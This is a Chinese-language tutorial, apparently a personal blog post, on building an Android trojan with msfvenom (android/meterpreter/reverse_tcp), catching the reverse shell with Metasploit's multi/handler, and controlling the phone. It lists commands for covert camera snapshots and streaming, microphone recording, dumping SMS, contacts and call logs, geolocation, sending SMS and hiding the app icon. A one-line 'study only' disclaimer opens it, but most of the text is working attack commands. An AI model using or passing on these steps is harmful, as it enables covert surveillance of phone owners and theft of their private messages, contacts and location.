此文章仅供个人学习,请勿用于其他非法用途。

实验环境

系统: Kali Liunx

工具: MFS

目标 :安卓手机

  • 首先打开msf,输入命令 show payloads 查看攻击载荷

  • 配置木马并生成

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.74.129 LPORT=4444 R > /root/桌面/shell.apk

命令说明:

android/meterpreter/reverse_tcp 攻击载荷

LHOST=192.168.74.129 控制端的IP(也就是本机kali的ip) 查询IP的指令 ifconfig

LPORT=4444 监听端口

R > /root/桌面/shell.apk 保存路径为桌面

附图!

  • 启用攻击模块,并配置控制端信息。

use exploit/multi/handler 选择攻击模式

set payload android/meterpreter/reverse_tcp 加载攻击模块

show options 查看参数设置

set LHOST 设置攻击机ip

set LPORT 设置监听端口

exploit 执行

最后等待马子上线,反弹shell到控制端。

附图!!

控制终端输入 sysinfo 查看手机系统相关信息

控制终端输入 webcam_list 查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

webcam_snap 隐秘拍照功能

webcam_stream开启摄像头

常用命令

webcam_list  列出网络摄像头

record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒
webcam_chat  开始视频聊天
webcam_snap  从指定的摄像头获取快照
webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头
activity_start  从URI字符串启动Android活动
check_root  检查设备是否有根
dump_calllog  获取调用日志
dump_contacts  获取联系人列表
dump_sms  获取短信
geolocate  利用地理定位获取当前LAT
wlan_geolocate  利用WLAN信息获取当前LAT
hide_app_icon  从发射器隐藏应用程序图标
interval_collect  管理区间收集能力
send_sms  从目标会话发送短消息
set_audio_mode
sqlite_query  从存储库查询SQLite数据库
wakelock  启用/禁用Wakelock
最后修改:2020 年 09 月 02 日 10 : 52 PM